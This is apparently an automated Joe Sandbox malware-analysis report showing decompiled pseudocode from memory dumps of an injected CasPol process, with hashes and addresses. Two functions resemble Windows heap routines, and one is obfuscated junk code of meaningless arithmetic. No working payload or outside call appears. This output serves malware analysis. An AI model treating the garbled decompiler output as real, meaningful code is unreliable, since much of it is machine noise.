                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                        • Instruction ID: 5f564f69def01c1aca910427e191b8fc84d7f5bc0559e9c01ae9d0dacc3e6adc
                                                                        • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                        • Instruction Fuzzy Hash: 2D815B2190437A8FEB214E6CC4C927EBB95EF52208F6C457BD9468B791C23598C6D392
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DAB40 Relevance: .2, Instructions: 240COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E013DAB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E0147A80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E0147A80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x13984d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x13984d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x13984d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x13984d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E0147A80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}











































                                                                        0x013dab4a
                                                                        0x013dab51
                                                                        0x013dab57
                                                                        0x013dab5b
                                                                        0x013dab5e
                                                                        0x013dab61
                                                                        0x013dab64
                                                                        0x013dab67
                                                                        0x013dab6c
                                                                        0x013dabbb
                                                                        0x013dabbb
                                                                        0x00000000
                                                                        0x013dab6e
                                                                        0x013dab6e
                                                                        0x013dab73
                                                                        0x013dad70
                                                                        0x013dab79
                                                                        0x013dab79
                                                                        0x013dab83
                                                                        0x013dab86
                                                                        0x013dab8b
                                                                        0x013dab8f
                                                                        0x013dab9a
                                                                        0x013dab9d
                                                                        0x013daba4
                                                                        0x0142242c
                                                                        0x01422439
                                                                        0x0142243e
                                                                        0x0142243e
                                                                        0x013dabaa
                                                                        0x013dabad
                                                                        0x013dabad
                                                                        0x013dabb5
                                                                        0x013dabb5
                                                                        0x013dabb9
                                                                        0x013dabc6
                                                                        0x013dabca
                                                                        0x013dad7a
                                                                        0x013dabd0
                                                                        0x013dabd0
                                                                        0x013dabda
                                                                        0x013dabdd
                                                                        0x013dabe2
                                                                        0x013dabe6
                                                                        0x013dabf1
                                                                        0x013dabf4
                                                                        0x013dabfb
                                                                        0x01422446
                                                                        0x01422453
                                                                        0x01422458
                                                                        0x01422458
                                                                        0x013dac01
                                                                        0x013dac04
                                                                        0x013dac04
                                                                        0x013dac0c
                                                                        0x013dac0c
                                                                        0x013dac10
                                                                        0x013dad6b
                                                                        0x013dac16
                                                                        0x013dac16
                                                                        0x013dac1c
                                                                        0x013daca7
                                                                        0x013dacba
                                                                        0x013dacbd
                                                                        0x013dacc8
                                                                        0x013dacc9
                                                                        0x013daccc
                                                                        0x013daccf
                                                                        0x013dad00
                                                                        0x013dad04
                                                                        0x013dad07
                                                                        0x013dad0a
                                                                        0x013dad0d
                                                                        0x00000000
                                                                        0x013dad0f
                                                                        0x00000000
                                                                        0x013dad0f
                                                                        0x00000000
                                                                        0x013dad0d
                                                                        0x013dad40
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013dacd1
                                                                        0x013dacd1
                                                                        0x013dacd4
                                                                        0x013dad16
                                                                        0x013dad1b
                                                                        0x013dad54
                                                                        0x013dad1d
                                                                        0x013dad20
                                                                        0x013dad27
                                                                        0x013dad27
                                                                        0x013dacd6
                                                                        0x013dacd6
                                                                        0x013dacdb
                                                                        0x013dad39
                                                                        0x013dacdd
                                                                        0x013dacdd
                                                                        0x013dacdd
                                                                        0x013dacdb
                                                                        0x013dace7
                                                                        0x013daced
                                                                        0x0142247f
                                                                        0x0142247f
                                                                        0x013dacf6
                                                                        0x013dabbd
                                                                        0x013dabc3
                                                                        0x013dabc3
                                                                        0x013dac2b
                                                                        0x013dac2f
                                                                        0x013dac32
                                                                        0x01422460
                                                                        0x01422460
                                                                        0x013dac3b
                                                                        0x013dac40
                                                                        0x013dad42
                                                                        0x013dad4a
                                                                        0x013dac46
                                                                        0x013dac46
                                                                        0x013dac48
                                                                        0x013dad5b
                                                                        0x013dac4e
                                                                        0x013dac4e
                                                                        0x013dac51
                                                                        0x013dac58
                                                                        0x013dac5d
                                                                        0x013dac66
                                                                        0x013dac6d
                                                                        0x013dac74
                                                                        0x013dac77
                                                                        0x01422467
                                                                        0x01422472
                                                                        0x01422477
                                                                        0x01422477
                                                                        0x013dac77
                                                                        0x013dac7d
                                                                        0x013dac83
                                                                        0x013dac88
                                                                        0x013dac88
                                                                        0x013dac8c
                                                                        0x013daca4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013dac8e
                                                                        0x013dac8e
                                                                        0x013dac90
                                                                        0x013dac93
                                                                        0x00000000
                                                                        0x013dac46
                                                                        0x013dac40
                                                                        0x013dac1c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013dabb9
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e29863718b619705c0f583e496b603ae8ef09ac61633d8aa6ca6881210b3bf0f
                                                                        • Instruction ID: a3e8c1abf49d73b792f1a9e280a961f2bd8374a5ecf2047f0470fe89e7259c70
                                                                        • Opcode Fuzzy Hash: e29863718b619705c0f583e496b603ae8ef09ac61633d8aa6ca6881210b3bf0f
                                                                        • Instruction Fuzzy Hash: 7F81C333A002198BDF24CE6DD694B7AB7E1EB84319F19429AD981EB781D630ED45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014825DD Relevance: .2, Instructions: 232COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E014825DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E01482E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x14a6110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x14a6110; // 0x6fc0a953
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x14a6110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E013FD340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E013FD0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E013CFFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x139ac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x139ac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x139ac00; // 0x6060706
					_t48 = _t123 + 0x139ac00; // 0x6070708
					_t142 = _v16;
					if(E01482FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E013D2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x14a6110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x14a6110; // 0x6fc0a953
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x14a6110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x14a6110 ^ _t168) & 0x7fff0000;
					}
					E0148241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                                                        0x014825e6
                                                                        0x014825f6
                                                                        0x014825fb
                                                                        0x014825fe
                                                                        0x01482603
                                                                        0x01482610
                                                                        0x01482611
                                                                        0x01482613
                                                                        0x0148262f
                                                                        0x01482634
                                                                        0x01482639
                                                                        0x01482641
                                                                        0x01482643
                                                                        0x01482646
                                                                        0x01482648
                                                                        0x01482649
                                                                        0x01482649
                                                                        0x01482649
                                                                        0x01482646
                                                                        0x0148263b
                                                                        0x0148263b
                                                                        0x0148263d
                                                                        0x0148263d
                                                                        0x01482639
                                                                        0x01482651
                                                                        0x01482653
                                                                        0x01482655
                                                                        0x01482657
                                                                        0x0148265c
                                                                        0x01482668
                                                                        0x0148266a
                                                                        0x01482675
                                                                        0x0148267c
                                                                        0x01482680
                                                                        0x01482684
                                                                        0x01482687
                                                                        0x01482692
                                                                        0x01482695
                                                                        0x01482698
                                                                        0x0148269d
                                                                        0x014826a2
                                                                        0x014826a4
                                                                        0x014826a4
                                                                        0x014826a8
                                                                        0x014826b2
                                                                        0x014826c0
                                                                        0x014826c6
                                                                        0x014826c9
                                                                        0x014826d1
                                                                        0x014826d4
                                                                        0x014826e2
                                                                        0x014826ea
                                                                        0x014826ed
                                                                        0x014826f1
                                                                        0x014826f6
                                                                        0x014826f9
                                                                        0x01482707
                                                                        0x0148270d
                                                                        0x01482710
                                                                        0x01482713
                                                                        0x01482718
                                                                        0x0148271d
                                                                        0x0148271d
                                                                        0x01482722
                                                                        0x01482750
                                                                        0x01482758
                                                                        0x0148275d
                                                                        0x01482760
                                                                        0x01482766
                                                                        0x01482769
                                                                        0x0148276e
                                                                        0x01482771
                                                                        0x01482777
                                                                        0x0148277d
                                                                        0x01482783
                                                                        0x01482791
                                                                        0x014827a7
                                                                        0x014827a9
                                                                        0x014827ab
                                                                        0x014827ab
                                                                        0x014827b1
                                                                        0x014827b4
                                                                        0x014827b4
                                                                        0x014827bc
                                                                        0x014827bf
                                                                        0x014827c2
                                                                        0x014827c2
                                                                        0x014827db
                                                                        0x014827df
                                                                        0x014827e5
                                                                        0x014827e8
                                                                        0x014827f0
                                                                        0x014827ff
                                                                        0x014827ff
                                                                        0x014827f2
                                                                        0x014827f4
                                                                        0x014827f4
                                                                        0x0148281a
                                                                        0x01482824
                                                                        0x01482826
                                                                        0x01482834
                                                                        0x01482843
                                                                        0x01482858
                                                                        0x01482858
                                                                        0x01482866
                                                                        0x01482866
                                                                        0x01482873

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a42237480b04e7c63a1c18fa7e0c1cdc41775d402dcf5d39218cfd71372f83e3
                                                                        • Instruction ID: 2aa45a6656738c7632eedbba0ee2c93a978009bd9ba8f15ae16c8a3807abd1d0
                                                                        • Opcode Fuzzy Hash: a42237480b04e7c63a1c18fa7e0c1cdc41775d402dcf5d39218cfd71372f83e3
                                                                        • Instruction Fuzzy Hash: FE81E672A101159BCF18DF79C890A7EBBF1FF88310B1A826AD815EB395DA34A901CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421B68 Relevance: .2, Instructions: 229COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E00421B68(signed int __eax, signed int __ebx, intOrPtr __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t46;
				signed int _t47;
				signed int _t48;
				intOrPtr _t50;
				signed char _t52;
				signed int _t54;
				signed int _t55;

				_t54 = __esi;
				_t52 = __edx;
				_t50 = __ecx;
				_t48 = __ebx;
				asm("sbb eax, 0x4eeb4b34");
				asm("rol dword [eax-0x327fd322], 0xa8");
				 *0x16c5c8ef =  *0x16c5c8ef + __ebx;
				_t55 =  *0x5289cc67;
				_t46 = __eax &  *0x4710d720;
				 *0xd73167e2 = __edx;
				 *0x7565f133 =  *0x7565f133 | _t46;
				asm("rcl dword [0x68649dd8], 0x53");
				_push(__ecx);
				_t47 = _t46 + 0x3d74df92;
				if(( *0x598113cb & __edx) >= 0) {
					L1:
					asm("sbb [0xc36efb09], edx");
					asm("adc [0x767ba821], ebx");
					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
					_t47 = _t47 & 0x0000000c;
					_t55 = (_t55 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
					asm("sbb ebp, [0x8771e3b]");
					_push(_t55);
					_t54 = _t54 &  *0x912dd0fb;
					_t52 = _t52 & 0x00000020;
					asm("rol byte [0xf89935f2], 0x22");
					asm("rol dword [0xfbe9540d], 0x6c");
					 *0x9459ca0a = _t50;
					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
					asm("adc bl, [0xc320ed3c]");
					asm("scasb");
					_t50 =  *0x9459ca0a - 1;
					 *0xaab74829 =  *0xaab74829 ^ _t47;
					asm("rcl dword [0x7f106817], 0x35");
					asm("adc eax, [0x9d56ea15]");
					_t48 = _t48 +  *0x5ceec7ba &  *0x3b22d9f7;
					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
					goto L1;
				}
				__ebx = __ebx + 0x4d8c6179;
				 *0x37f7cf81 =  *0x37f7cf81 - __eax;
				 *0xb9a68cc6 =  *0xb9a68cc6 << 0xea;
				_push(__esp);
				__esp = __esp ^ 0xeb6a169d;
				__eflags =  *0xfe48edf & __ebx;
				if(( *0xfe48edf & __ebx) == 0) {
					goto L1;
				}
				__esp = __esp & 0x4b5b4f74;
				asm("scasb");
				asm("sbb [0xf34d368c], edi");
				 *0xdd804932 =  *0xdd804932 >> 0;
				 *0xa4852eee =  *0xa4852eee + __edi;
				 *0x4f56cb39 =  *0x4f56cb39 << 0xbd;
				_push(__esp);
				asm("adc edi, [0x4b66b867]");
				__edi & 0xc70faff4 =  *0x5726cbf2 & __bh;
				__edx = __edx + 1;
				asm("scasb");
				 *0x755e6536 =  *0x755e6536 - __esp;
				asm("rcl dword [0x91febd67], 0x5d");
				asm("rcr byte [0x43a84b7], 0x21");
				asm("ror dword [0xe4a793d], 0x73");
				__eflags =  *0x9ab4493e & __edx;
				 *0x5b4e7526 =  *0x5b4e7526 ^ __edi;
				__esp = 0x1e9c31c2;
				__esp = 0x1e9c31c2 ^  *0x52a2e0bc;
				asm("scasd");
				asm("lodsd");
				asm("rol byte [0x94b6f6ca], 0x25");
				 *0xa79cd09f & __edx =  *0xb5279eca - __ch;
				 *0x7ed032e5 =  *0x7ed032e5 << 0x61;
				__eflags =  *0xa5cf1060 * 0x5e2c -  *0xef866d3d;
				if( *0xa5cf1060 * 0x5e2c >=  *0xef866d3d) {
					goto L1;
				}
				__ecx =  *0xb33457d * 0x132b;
				__esp =  *0x4a089969 * 0xfdd6;
				__ecx =  *0xb33457d * 0x132b -  *0xad50b9cf;
				__ch =  *0x11f5d332;
				__edx = __edx & 0x8a020536;
				asm("rol byte [0x5f88c84], 0x56");
				 *0x846f74f2 =  *0x846f74f2 - __dl;
				__eflags =  *0x846f74f2;
				__edi = 0x60ca05f8;
				if( *0x846f74f2 != 0) {
					goto L1;
				}
				__eflags = __esi -  *0xca05f87b;
				asm("adc esi, [0xf88f593f]");
				__esp =  *0x5530ca05;
				__ecx =  *0xa05f88d;
				if(__esi >=  *0xca05f87b) {
					goto L1;
				}
				 *0xf87d6171 =  *0xf87d6171 << 0x31;
				__eax = __eax -  *0x1e02f703;
				 *0x62c20b04 =  *0x62c20b04 ^ __al;
				__dl = __dl & 0x000000f9;
				__eflags =  *0x85a104f9 & __al;
				__edx = __edx +  *0xa204f96f;
				 *0x5f9718c & __edx =  *0x713a183d - __edi;
				__ebx = __ebx |  *0x485105f8;
				__eflags = __ebx;
				if(__ebx != 0) {
					goto L1;
				}
				 *0x8c05f87b =  *0x8c05f87b - __esi;
				__esi = __esi - 1;
				__eflags = __esi;
				_push(__esp);
				if(__esi >= 0) {
					goto L1;
				}
				__ebx = __ebx |  *0xc907f879;
				 *0x7b490cd2 & __bh =  *0xb3073389 & __edx;
				asm("lodsd");
				__edi = __edi & 0x876e1ece;
				__eflags =  *0x34900733 & __ebx;
				asm("adc [0x8d7818d5], edx");
				__edi = __edi &  *0x31990733;
				__bl = __bl ^ 0x000000c9;
				 *0x339575ff = __ecx;
				__eflags = __bl & 0x00000008;
				if((__bl & 0x00000008) != 0) {
					goto L1;
				}
				__edi = __edi +  *0x6a57407b;
				__eflags = __edi;
				if(__edi != 0) {
					goto L1;
				}
				__eflags =  *0xfb368575 & __ebx;
				__edi =  *0x645ed711;
				asm("ror dword [0xa2fd62c8], 0x46");
				 *0xf94a5b17 =  *0xf94a5b17 >> 0xbc;
				__edi =  *0x645ed711 | 0x8eeac82e;
				asm("adc al, [0x691407c6]");
				__bh = __bh -  *0xff3a12c;
				asm("sbb ch, [0x4cf2d7b6]");
				 *0x2bb3899b =  *0x2bb3899b & __ebx;
				asm("rcl dword [0x12a35365], 0x54");
				 *0x6a3d55c8 =  *0x6a3d55c8 >> 0x89;
				__edi = ( *0x645ed711 | 0x8eeac82e) +  *0xde983ecd;
				__eflags = __bl & 0x0000002c;
				__edi = ( *0x645ed711 | 0x8eeac82e) +  *0xde983ecd + 0xa2192c1f;
				asm("adc [0xdcd76ec6], bl");
				 *0x96b50b34 =  *0x96b50b34 ^ __ch;
				asm("adc bh, 0xa8");
				__esi = __esi & 0x49eddfc5;
				 *0x753543e1 =  *0x753543e1 | __dl;
				_push( *0x37c42c06);
				asm("movsw");
				__esp =  *0x580c4460 * 0x30d7;
				__eflags = __edx -  *0x80e72481;
				__esi = __esi -  *0x6d06f40d;
				__eflags = __esi;
				if(__esi > 0) {
					goto L1;
				}
				asm("adc edx, [0x3a520777]");
				__bh = __bh &  *0xcab003e5;
				_t36 = __ebx;
				__ebx =  *0x21e11633;
				 *0x21e11633 = _t36;
				_pop( *0x1e86ea9f);
				asm("adc edi, 0xce5d00bc");
				__edx = __edx +  *0x7bce6198;
				 *0x27d00fda =  *0x27d00fda >> 0x8a;
				__ecx = __ecx +  *0x14fb50cd;
				asm("sbb [0xb684e311], edx");
				__ch = __ch ^ 0x000000e1;
				 *0x8e6142b1 =  *0x8e6142b1 >> 0x5a;
				__eflags =  *0x485a289 & __ecx;
				asm("adc esp, 0xb636bbc");
				 *0x31091c07 =  *0x31091c07 << 0x7b;
				asm("adc dl, 0xd7");
				_push(__esp);
				asm("sbb eax, [0x16b88c03]");
				 *0x359a40a =  *0x359a40a + __dl;
				__eflags =  *0x359a40a;
				asm("rcl dword [0x3d21200e], 0x59");
				if( *0x359a40a > 0) {
					goto L1;
				}
				asm("adc [0xcc63a277], eax");
				asm("ror byte [0xdc371d82], 0x1c");
				__edi = __edi - 0x8a3f2829;
				__dl = __dl & 0x00000010;
				 *0x3c13fb25 =  *0x3c13fb25 - 0x733cbcda;
				__edi =  *0x91d5846b * 0x89a3;
				__ecx = __ecx + 1;
				__eflags = __ecx;
				if(__ecx >= 0) {
					goto L1;
				}
				__edx = __edx ^  *0xc812f879;
				__eflags = __edx;
				 *0xc5dd22dd = __esp;
				_t39 = __edx;
				__edx =  *0x92790ad9;
				 *0x92790ad9 = _t39;
				if(__eflags < 0) {
					goto L1;
				}
				__esi =  *0x122a067c * 0x5fed;
				_pop(__edx);
				_pop( *0xe1d49003);
				__ecx = __ecx - 1;
				asm("adc edx, [0xe04c91cc]");
				 *0xcc721d62 & 0x733cbcda = 0x733cbcda -  *0x7d7d1517;
				asm("ror dword [0xcbc195f4], 0xdd");
				asm("adc ah, 0x34");
				__eflags = __eax -  *0x8e331535;
				 *0xb178d83a = __bh;
				__eflags = __ebx & 0xf60f1e05;
				__esp = __esp + 1;
				asm("ror dword [0x16738f0e], 0x37");
				__bl = __bl ^ 0x00000084;
				__eax = __eax - 1;
				_pop( *0x791f5cf1);
				__eax = __eax - 1;
				__ecx =  *0x9d4f7239;
				asm("rol dword [0x4e3cbb67], 0xcc");
				__edi = __edi -  *0x8e138192;
				__eflags =  *0xc04b858d & __ecx;
				asm("sbb al, 0xe3");
				 *0xc43a02b8 =  *0xc43a02b8 &  *0x122a067c * 0x00005fed;
				asm("rol byte [0xd0ae5420], 0xa2");
				__esi =  *0x270e546b * 0xfdd6;
				__esi =  *0x270e546b * 0xfdd6 - 1;
				asm("stosb");
				__eflags = __ecx -  *0xa9d925da;
				_pop( *0xb864e79e);
				asm("ror byte [0xb2ca11b1], 0x61");
				asm("sbb edi, 0xd93e5c36");
				__eflags =  *0x5b29550b - __ecx;
				 *0x91d4c3cf =  *0x91d4c3cf & 0x733cbcda;
				__edx = __edx ^  *0x1907009e;
